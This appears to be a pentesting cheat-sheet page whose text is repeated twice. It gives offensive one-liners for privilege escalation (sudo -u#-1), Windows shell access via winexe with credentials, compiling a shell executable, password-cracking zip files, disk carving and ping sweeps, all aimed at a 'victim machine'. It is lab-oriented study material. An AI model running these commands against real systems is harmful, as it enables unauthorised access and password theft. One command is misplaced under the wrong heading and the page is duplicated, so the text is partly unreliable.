Tips & Tricks

Spawn root shell

sudo -s

# Can't execute /bin/bash?
# Older version of sudo are vulnerable to this priv esc method:

sudo -u#-1 /bin/bash

No "whoami" on Windows?

try:

echo %username%
set

# if the above do not work, you may transfer Kali's 'whoami.exe'to victim machine

Banner Grab a website

curl -s -I IP_ADDRESS

Mingw C compiler for windows

x86_64-w64-mingw32-gcc shell.c -o shell.exe <--for 64 bit

i686-w64-mingw32-gcc shell.c -o shell.exe <--for 32 bit

winexe

In Kali, the winexe can be used to spawn a shell, for windows 2003, XP, and earlier. Unlikely to find these operating systems in the wild, but they may be in pentesting labs.

winexe -U ‘admin%password’ //10.10.10.14 cmd.exe

Grep for deleted files

grep --binary-files=text --context=100 'root' /dev/sdb > /tmp/root.txt

#assuming the deleted file was originally stored on /dev/sdb and contained the word 
#root in the filename, we can partially recover it and save it as /tmp/root/txt

Cracking zip files

git clone https://github.com/saghul/lxd-alpine-builder.git

fcrackzip -v -D -u -p /usr/share/dict/words secret.zip

fcrackzip -v -D -u -p ./rockyou.txt 16162020_backup.zip

Ping sweep Windows

FOR /L %i IN (1,1,254) DO ping -n 1 172.16.2.%i

# pipe to file:
FOR /L %i IN (1,1,254) DO ping -n 1 172.16.2.%i | FIND /i "Reply" >> C:\Users\ip.txt

PreviousWriting /etc/passwd NextSSH Local Port Forwarding

Last updated 4 years ago

Was this helpful?

Tips & Tricks

Spawn root shell

sudo -s

# Can't execute /bin/bash?
# Older version of sudo are vulnerable to this priv esc method:

sudo -u#-1 /bin/bash

No "whoami" on Windows?

try:

echo %username%
set

# if the above do not work, you may transfer Kali's 'whoami.exe'to victim machine

Banner Grab a website

curl -s -I IP_ADDRESS

Mingw C compiler for windows

x86_64-w64-mingw32-gcc shell.c -o shell.exe <--for 64 bit

i686-w64-mingw32-gcc shell.c -o shell.exe <--for 32 bit

winexe

In Kali, the winexe can be used to spawn a shell, for windows 2003, XP, and earlier. Unlikely to find these operating systems in the wild, but they may be in pentesting labs.

winexe -U ‘admin%password’ //10.10.10.14 cmd.exe

Grep for deleted files

grep --binary-files=text --context=100 'root' /dev/sdb > /tmp/root.txt

#assuming the deleted file was originally stored on /dev/sdb and contained the word 
#root in the filename, we can partially recover it and save it as /tmp/root/txt

Cracking zip files

git clone https://github.com/saghul/lxd-alpine-builder.git

fcrackzip -v -D -u -p /usr/share/dict/words secret.zip

fcrackzip -v -D -u -p ./rockyou.txt 16162020_backup.zip

Ping sweep Windows

FOR /L %i IN (1,1,254) DO ping -n 1 172.16.2.%i

# pipe to file:
FOR /L %i IN (1,1,254) DO ping -n 1 172.16.2.%i | FIND /i "Reply" >> C:\Users\ip.txt

PreviousWriting /etc/passwd NextSSH Local Port Forwarding

Last updated 4 years ago

Was this helpful?